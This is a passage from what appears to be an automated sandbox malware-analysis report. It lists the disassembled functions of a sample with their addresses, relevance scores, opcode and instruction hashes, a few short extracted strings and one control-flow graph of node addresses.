                                                  • Opcode Fuzzy Hash: 1b878763c0a2c0b363527e6db31446c2fce843c16a4bd716f5f2fca680784d32
                                                  • Instruction Fuzzy Hash: CEF10A75E0021ACFCF54CFA9C8826AEBBB2FF98310F14816AD615A7354D7349A85CF91
                                                  Function 00CDA178 Relevance: .3, Instructions: 294COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7cadc1499a9b2d27290e44da1ada50dedfae347ea4338e4d697e6dfcb203a43b
                                                  • Instruction ID: f7661c30d2e0fd9b8f0647943da7dae7b606d234ed3e1caf4a3ad34d59589454
                                                  • Opcode Fuzzy Hash: 7cadc1499a9b2d27290e44da1ada50dedfae347ea4338e4d697e6dfcb203a43b
                                                  • Instruction Fuzzy Hash: 70D1FD75E0020ACFCB44CFA9C8826AEBBB2FF98310F14816AD615E7354D7349A85CF91
                                                  Function 00CDA6A8 Relevance: .2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 296234fba52db15464868e5e468227bdf9efe692014c14f28fe610a0158437d8
                                                  • Instruction ID: 45e255d81bae5e08cb3b531d624924de60605b937490899de702c0bbd917be5a
                                                  • Opcode Fuzzy Hash: 296234fba52db15464868e5e468227bdf9efe692014c14f28fe610a0158437d8
                                                  • Instruction Fuzzy Hash: 7F91F575E0020ACBDB14CFA9C4825EEFBB2FF94314F24851AD615AB254D734AA86CBD1
                                                  Function 00CDBB20 Relevance: .1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02686dd6a575032de43436400aa0cf3a2bd0cf4e5b5abbe2112b5834209f9f2f
                                                  • Instruction ID: 6f7ffd5b08cdc7681c4a6acb8fe80e6b6299d70ed8f0e57ccfc4065e6b9e7f8a
                                                  • Opcode Fuzzy Hash: 02686dd6a575032de43436400aa0cf3a2bd0cf4e5b5abbe2112b5834209f9f2f
                                                  • Instruction Fuzzy Hash: 8F51E675E1122A9FCB44CFA9D8416EEBBF2BF48310F148A6AE425E7254D7749A01CF90
                                                  Function 00CDA698 Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91e0d806e17da30fc63f8e06ee2cae516ca419f88419017fb72adf2142cc2498
                                                  • Instruction ID: 066167a413ea5543b9552e772d93fce0520ecdeaa48e645f0a6f76e275889b06
                                                  • Opcode Fuzzy Hash: 91e0d806e17da30fc63f8e06ee2cae516ca419f88419017fb72adf2142cc2498
                                                  • Instruction Fuzzy Hash: B9412AB1E0124ACFDF14CFA9C4865EEBBB6AF94310F24802AD615A7254D7345A86CB92
                                                  Function 00CDB7D0 Relevance: .1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8b08b39f7951c8b702bda01248f76a755480293250d54224246ec47ffc9f53f
                                                  • Instruction ID: 5a34b9aca5d45c9c94e19a2d2f4e522020fb5bddf91ad1398d114a3989199eb7
                                                  • Opcode Fuzzy Hash: d8b08b39f7951c8b702bda01248f76a755480293250d54224246ec47ffc9f53f
                                                  • Instruction Fuzzy Hash: EF510275E0022A8FCB44CFA9C8459EEF7B1FF88314F148A6AD521B7250D7749A15CF90
                                                  Function 00CDAA50 Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 18b786cdbcc28559d7661b89290fcf5d44213befbbae5ed5ef0cfb62defda066
                                                  • Instruction ID: be37f17f3720b319ebc33a3cd64c3cffac7edf2295af1c01c64da4728417bf03
                                                  • Opcode Fuzzy Hash: 18b786cdbcc28559d7661b89290fcf5d44213befbbae5ed5ef0cfb62defda066
                                                  • Instruction Fuzzy Hash: 5F4182B5E1021A8FCB44CFA9C8455EEF7F2FB88210F048A6AD425B7354D7749A51CF91
                                                  Function 023D9A4C Relevance: .1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 00a417d6b6c18a0e1f34698f76c3847bce15589ca1ffecee9efe8228e22475d3
                                                  • Instruction ID: a2c7dfae395ba99fa4b9bf5ee221334562e05b2d8dcf647e141076aca7aadea5
                                                  • Opcode Fuzzy Hash: 00a417d6b6c18a0e1f34698f76c3847bce15589ca1ffecee9efe8228e22475d3
                                                  • Instruction Fuzzy Hash: C221BF79D04218DFDB00CFA9D88499DFBF1BB49310F10A16AE815B7360D7349901CF58
                                                  Function 023D9A58 Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1506fbfa7af1c423cf7d60fe2b2f8cdb894b5a82d5640aed5a0fa8363fb92d5b
                                                  • Instruction ID: aee78220900430ad161693530f48cd6f8523da9aba0186a1294a94da2647b3cf
                                                  • Opcode Fuzzy Hash: 1506fbfa7af1c423cf7d60fe2b2f8cdb894b5a82d5640aed5a0fa8363fb92d5b
                                                  • Instruction Fuzzy Hash: A3215DB9D04218DFDB14CFA9D8849ADFBF1BB49310F14A16AE815B7360D7349941CF58
                                                  Function 02501085 Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d527f1f218d38275c8b47376a71b4314234347fc1a401ac95de8779f263ce26f
                                                  • Instruction ID: 100133e1033171d3455781ec1cafc6d9c75331316f3bbe41ef44e0e5a2f41974
                                                  • Opcode Fuzzy Hash: d527f1f218d38275c8b47376a71b4314234347fc1a401ac95de8779f263ce26f
                                                  • Instruction Fuzzy Hash: 43112E70D0A6899FCB51CFA48850ABDBBF0BB06300F1485EAD054F7291C7345A45CB5A
                                                  Function 02500740 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1830705466ee8eebc41ac5de435ac9062dda15a91716bec08918ad9e2114e5d7
                                                  • Instruction ID: 4300ba02024c09470f0244315af1e0a09508fd77a95dad57c288f8ac5f6aa5b7
                                                  • Opcode Fuzzy Hash: 1830705466ee8eebc41ac5de435ac9062dda15a91716bec08918ad9e2114e5d7
                                                  • Instruction Fuzzy Hash: 41010478E44209DFCB40CFA8D980ABEBBF0BF09300F1054AAE425A3390D734AA40CF95
                                                  Function 025010A0 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61d1c50522333d41add4ba3911b8f0117977125bba02efb388939f114311d92c
                                                  • Instruction ID: 51dea31188b0a8d320b6668a036f6a765ed2286f79b1df2ef8066e416137a2b0
                                                  • Opcode Fuzzy Hash: 61d1c50522333d41add4ba3911b8f0117977125bba02efb388939f114311d92c
                                                  • Instruction Fuzzy Hash: BA01E2B4E05249DFCB50DFA9D980ABEBBF4BB05300F5085AAD428B3380D7759A41CF5A
                                                  Function 02501288 Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d80ce4c3f24c5a4794e6407593133b21e0e2760b2200fe648e24548204e2291d
                                                  • Instruction ID: 46766b9afc8442ecc9f0c33051048ee108fe09bf76c7613c5e000e76f0f609b4
                                                  • Opcode Fuzzy Hash: d80ce4c3f24c5a4794e6407593133b21e0e2760b2200fe648e24548204e2291d
                                                  • Instruction Fuzzy Hash: 8CE07574D05209AFCB54DFA9D844A9DFBF4AB46304F10A1AA9818B3250E7749A41DF49
                                                  Function 02500CB0 Relevance: 5.1, Strings: 4, Instructions: 58COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2434 2500cb0-2500ccb 2435 2500cd2-2500cd6 2434->2435 2436 2500ccd 2434->2436 2437 2500cf7 2435->2437 2438 2500cd8-2500ce1 2435->2438 2436->2435 2439 2500cfa-2500d01 2437->2439 2440 2500ce3-2500ce6 2438->2440 2441 2500ce8-2500ceb 2438->2441 2442 2500d22 2439->2442 2443 2500d03-2500d0c 2439->2443 2444 2500cf5 2440->2444 2441->2444 2447 2500d25-2500d2c 2442->2447 2445 2500d13-2500d16 2443->2445 2446 2500d0e-2500d11 2443->2446 2444->2439 2448 2500d20 2445->2448 2446->2448 2449 2500d4d 2447->2449 2450 2500d2e-2500d37 2447->2450 2448->2447 2453 2500d50-2500d57 2449->2453 2451 2500d39-2500d3c 2450->2451 2452 2500d3e-2500d41 2450->2452 2454 2500d4b 2451->2454 2452->2454 2455 2500d5e-2500d62 2453->2455 2454->2453
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
                                                  • Opcode ID: 74316d8ad76fae218aeceb448ab1446790448e0f2fe939e85351892189e21bed
                                                  • Instruction ID: f479567f1b2815b69daff191ce5df02de8c01deac78da96852d3347b2c43b6be
                                                  • Opcode Fuzzy Hash: 74316d8ad76fae218aeceb448ab1446790448e0f2fe939e85351892189e21bed
                                                  • Instruction Fuzzy Hash: 7421D831E4020CEFDB28DF98D984BADBBB5BB14300F108999E805AB3D4C771AB85DB55
                                                  Function 00CDDE38 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |bi$|bi
                                                  • API String ID: 0-1990502344
                                                  • Opcode ID: 8e3ee018e0d738ac34a73e10c6327d6d63bed9166e53b7b44377184fede3cc0f
                                                  • Instruction ID: ca4846d00282998c9306cf570dcd77e39873f27dbda5f1eb44d7f74a20299f3d
                                                  • Opcode Fuzzy Hash: 8e3ee018e0d738ac34a73e10c6327d6d63bed9166e53b7b44377184fede3cc0f
                                                  • Instruction Fuzzy Hash: CA21C574E01209DFCB48DFA9D5849ADBBF2FF98300F25859AE815AB760C730AE40DB50
                                                  Function 023D9938 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID: EnumWindows
                                                  • String ID:
                                                  • API String ID: 1129996299-0
                                                  • Opcode ID: b8fdf83c0d31c05259c181381ef27e51c7ef223ecc1f7a2ce215b5ee592c0a73
                                                  • Instruction ID: b9b86e4fd2bc792b197820dadcfdc73aa12446964d2442778237f2fde5eeb238
                                                  • Opcode Fuzzy Hash: b8fdf83c0d31c05259c181381ef27e51c7ef223ecc1f7a2ce215b5ee592c0a73
                                                  • Instruction Fuzzy Hash: B131CAB5D012589FDB10DFA9E584AEEFBF0EF49314F24906AE419B7210C734AA45CF58
                                                  Function 023D9940 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID: EnumWindows
                                                  • String ID:
                                                  • API String ID: 1129996299-0
                                                  • Opcode ID: f98dbc1bbce5540baf9579eda40ae7cf1b15c01561e0a2007d008653c4c6fb2e
                                                  • Instruction ID: f05edc23238925bb1699c87c4dee2f3aa100c2b983b546b0b0e17cf8dd20b7ec
                                                  • Opcode Fuzzy Hash: f98dbc1bbce5540baf9579eda40ae7cf1b15c01561e0a2007d008653c4c6fb2e
                                                  • Instruction Fuzzy Hash: 6731B8B5D012189FCB14CFA9E984AEEFBF0AF49314F20902AE418B7250C774AA45CF58
                                                  Function 00CD9A90 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,N"
                                                  • API String ID: 0-1483149224
                                                  • Opcode ID: 21f513dac89e89b977fc10bcbe9a6abb89165788e6b8ca8c87ebfb4462591a7a
                                                  • Instruction ID: 1ffd082d3854ec9f31cbc43878d40f3badc59b6dde60cfd889a90a2aa5360c4f
                                                  • Opcode Fuzzy Hash: 21f513dac89e89b977fc10bcbe9a6abb89165788e6b8ca8c87ebfb4462591a7a
                                                  • Instruction Fuzzy Hash: 0981D974E12209EFCB54DFA8E594A9DBBB2FF49310F20502AE415AB365DB349E46CF40
                                                  Function 00CDF908 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hbq
                                                  • API String ID: 0-1245868
                                                  • Opcode ID: 8f513f8d99439a058e7e40573d40d5ef10fb010e279bb37800ca200d592ff04e
                                                  • Instruction ID: 7c79a07cd559e1d1b28fad5a0abc64b9cc3b1e0844ac0568b535571a73513354
                                                  • Opcode Fuzzy Hash: 8f513f8d99439a058e7e40573d40d5ef10fb010e279bb37800ca200d592ff04e
                                                  • Instruction Fuzzy Hash: B6313670D0120AEFCB05CFA8C68569DFBB1FF85310F2091AAD555AB2A2D7345F46DB90
                                                  Function 00CDDE28 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |bi
                                                  • API String ID: 0-3239024895
                                                  • Opcode ID: 5d4144e5648103d4546c8c0ca7730b9fd47d8e574ac063e3d23d15c2a39606fd
                                                  • Instruction ID: e9bb01fb9c5d961e4f7dad247c5fa02947f020ce1ea726c32cf2a2e719ec2f9f
                                                  • Opcode Fuzzy Hash: 5d4144e5648103d4546c8c0ca7730b9fd47d8e574ac063e3d23d15c2a39606fd
                                                  • Instruction Fuzzy Hash: 2C310474E05248DFCB49CFA9C5449ADBBF2FF99300F2581AAE815AB361C770AE04DB41
                                                  Function 00CDACF0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -K9]
                                                  • API String ID: 0-344812077
                                                  • Opcode ID: b3094799680e990506687b10b686396f71e340a4d50071464915b0d53ea4ca29
                                                  • Instruction ID: 317f64b810d3b12304676c414890512f7313642c8a796cf14f33bc423a5c04d0
                                                  • Opcode Fuzzy Hash: b3094799680e990506687b10b686396f71e340a4d50071464915b0d53ea4ca29
                                                  • Instruction Fuzzy Hash: C421C4B5E01209DFCB48CFA9D681AADBBF2AF48304F2480A9D418E7350D7759F41DB81
                                                  Function 00CDF918 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hbq
                                                  • API String ID: 0-1245868
                                                  • Opcode ID: 637e0bb572156effd8104bd0069d30bab93bf2e90d22d17ba72bf9904612e154
                                                  • Instruction ID: b9a20dfca584a184eae5df122dd61e84613ce3557f46479dcae5e5acadfc68ff
                                                  • Opcode Fuzzy Hash: 637e0bb572156effd8104bd0069d30bab93bf2e90d22d17ba72bf9904612e154
                                                  • Instruction Fuzzy Hash: FD21B274D0120AEFCB44DFE9C6856ADFBB1FF84300F2085AA9555A7261E7345B42DB90
                                                  Function 00CD0839 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XUi
                                                  • API String ID: 0-1850529527
                                                  • Opcode ID: 2c471ebd019a0c6a49e1d50b65ba808733797934202cba9d2f18e45aae8716a6
                                                  • Instruction ID: a5f1aa52fa29e23429709cb00c9d887fe32ed8e7d856193f5b8fffb089c55ffb
                                                  • Opcode Fuzzy Hash: 2c471ebd019a0c6a49e1d50b65ba808733797934202cba9d2f18e45aae8716a6
                                                  • Instruction Fuzzy Hash: 2BF0BE705093818FC70ADFB4D91569C7F73AB46301B9162DB90119B5E3CA340A06E751
                                                  Function 00CD0848 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XUi
                                                  • API String ID: 0-1850529527
                                                  • Opcode ID: 82e5ea3a5e3528bc94826d3e593b07c2c7566802fdbb2f4fbe3e3043d678ad60
                                                  • Instruction ID: bac1aa1a74a78ff16d5b487747bce7f4c51be1d765cbe178f7a2ba5a7dbe57fa
                                                  • Opcode Fuzzy Hash: 82e5ea3a5e3528bc94826d3e593b07c2c7566802fdbb2f4fbe3e3043d678ad60
                                                  • Instruction Fuzzy Hash: 0BE09B70D01208DFCB44EFB8E80569CBBB7EB44301F9051AA9505E3250DF300B45E740
                                                  Function 00CDFA01 Relevance: .1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5ac989020d66bcb4aa75db0847591ad2f7292c6ba1391d96311927b648c0ef2
                                                  • Instruction ID: 952e0ac9edb89f49c98eb47f0d050c66b454c43603b644764d158eb5fadb90ce
                                                  • Opcode Fuzzy Hash: f5ac989020d66bcb4aa75db0847591ad2f7292c6ba1391d96311927b648c0ef2
                                                  • Instruction Fuzzy Hash: 17512671E00219AFCF08DFA9E8514EDBBB2FF89301F04806AE519A7350DB345A16DF91
                                                  Function 00CDB970 Relevance: .1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88a87e9c5e1a9a213a705148e02b22552692aaaaa25c65a9c21e70ba92bb5cda
                                                  • Instruction ID: 533c66a14fe2d8f6f60202227d9acb574827a1d84c04a51520d6ca4e90fba216
                                                  • Opcode Fuzzy Hash: 88a87e9c5e1a9a213a705148e02b22552692aaaaa25c65a9c21e70ba92bb5cda
                                                  • Instruction Fuzzy Hash: 7F51B574E0120ADFCB48DFAAD4555AEBBB2FF88311F00816AE525A7354D7399A42CF90
                                                  Function 00CDC9C0 Relevance: .1, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c2c46b26937fdd41a779b195310deee150c02e94608b63522fd10ec850831c78
                                                  • Instruction ID: 46c314231138d4498114d84a1a17e4a56067392c6f66fd89341073158da940d7
                                                  • Opcode Fuzzy Hash: c2c46b26937fdd41a779b195310deee150c02e94608b63522fd10ec850831c78
                                                  • Instruction Fuzzy Hash: 3A513C74E012099FCB05CFA9D58599DBBF2FF89310F14C1AAD429AB361D7359A02CF50
                                                  Function 00CDCA10 Relevance: .1, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a47edcc540ed3889712383b7469acaa6751e1d6648d392ecbab26ca46b0daea3
                                                  • Instruction ID: 83dfd33ec0563b549c91ec424b47c6d591fa356c21e2d4fe75f0c6df2b6cfa57
                                                  • Opcode Fuzzy Hash: a47edcc540ed3889712383b7469acaa6751e1d6648d392ecbab26ca46b0daea3
                                                  • Instruction Fuzzy Hash: 914118B5E012099FCB08CFA9D48599EBBF2FF89310F1481AAE529E7321D7359A41CF50
                                                  Function 00CDCA20 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39f1334850ae35591eba3623f7c8e0e8b677372e31dc2f6689a5f28038d4f4a5
                                                  • Instruction ID: e4b0d969e14ddb458227fc26748ad6a67c39c7524dc5a86089ad75b66fb65198
                                                  • Opcode Fuzzy Hash: 39f1334850ae35591eba3623f7c8e0e8b677372e31dc2f6689a5f28038d4f4a5
                                                  • Instruction Fuzzy Hash: 1A419575E012199FCB48CFAAD48599EBBF2FF88310F14C1AAE519A7320D7359A51CF50
                                                  Function 00CDD9C9 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53e199b2ed85f7b63007f72683720d7ddbd5fafea5928c391772f6427b87731a
                                                  • Instruction ID: 0ac789d9b5d25edc39fa5e561840961f59b5686c6c6a6c3778257ef1c7b55c18
                                                  • Opcode Fuzzy Hash: 53e199b2ed85f7b63007f72683720d7ddbd5fafea5928c391772f6427b87731a
                                                  • Instruction Fuzzy Hash: 6241CD74E002289FCB64DFA5D884BADB7B1BF44315F0081EAE55AAB361D734AE85CF50
                                                  Function 00CDA048 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa947af0fc6ef4fb89306e5d96a417722a276b16018f83acca90197efd2884c8
                                                  • Instruction ID: ed8fd47852f19e5f842897fb3e75c97dc1d2c03543cbe96c7e759d0668e60a43
                                                  • Opcode Fuzzy Hash: fa947af0fc6ef4fb89306e5d96a417722a276b16018f83acca90197efd2884c8
                                                  • Instruction Fuzzy Hash: F941B275E0021A9FDB44CFAAC845AEEBBF1AB88314F0481AAD425F7351D7789A45CF90
                                                  Function 00CDF440 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
